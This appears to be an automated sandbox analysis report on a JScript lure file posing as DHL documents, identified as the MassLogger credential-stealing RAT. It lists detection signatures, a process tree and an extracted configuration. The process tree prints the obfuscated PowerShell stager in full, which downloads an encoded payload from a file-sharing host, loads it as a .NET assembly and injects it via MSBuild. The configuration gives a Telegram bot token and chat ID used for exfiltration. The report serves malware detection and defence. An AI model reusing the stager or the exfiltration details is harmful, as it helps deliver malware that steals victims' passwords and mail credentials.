Windows
Analysis Report
DHl-Global-Documents.js
Overview
General Information
Detection
MassLogger RAT
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Powershell download and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7416 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\DHl-G lobal-Docu ments.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 7528 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " $rhizocrin us = '#x#. kes/moc.mi lezug#emsi k//:sp##h' ;$emascula tion = $rh izocrinus -replace ' #', 't';$E rlenmeyer = 'https:/ /3005.file mail.com/a pi/file/ge t?filekey= nIx_5T0LxH OBjilNb9CR viabPjrW2d lC-LxeOdJP F_Z_1MP6Cu QBS5KcptA& pk_vid=342 803d1cc4e3 b801739359 203b5fe9d' ;$nonsymme trical = N ew-Object System.Net .WebClient ;$unturf = $nonsymme trical.Dow nloadData( $Erlenmeye r);$aspect abund = [S ystem.Text .Encoding] ::UTF8.Get String($un turf);$cri stiform = '<<BASE64_ START>>';$ doura = '< <BASE64_EN D>>';$post modifier = $aspectab und.IndexO f($cristif orm);$prop ylaeum = $ aspectabun d.IndexOf( $doura);$p ostmodifie r -ge 0 -a nd $propyl aeum -gt $ postmodifi er;$postmo difier += $cristifor m.Length;$ thoracici = $propyla eum - $pos tmodifier; $tattooing s = $aspec tabund.Sub string($po stmodifier , $thoraci ci);$huhus = [System .Convert]: :FromBase6 4String($t attooings) ;$homotaxi c = [Syste m.Reflecti on.Assembl y]::Load($ huhus);$no nrehydrate d = [dnlib .IO.Home]. GetMethod( 'VAI').Inv oke($null, [object[] ] @($emasc ulation,'' ,'','','MS Build','', '','','',' ','','','' ,'',''))" MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) MSBuild.exe (PID: 7752 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- cleanup
{"EXfil Mode": "Telegram", "Telegram Token": "7950334281:AAHp9dAAfHNwUHbGM-dLD_Mx8gH7uJ3FUPE", "Telegram Chatid": "7273417767"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 15 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
| |
MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
| |
Click to see the 14 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |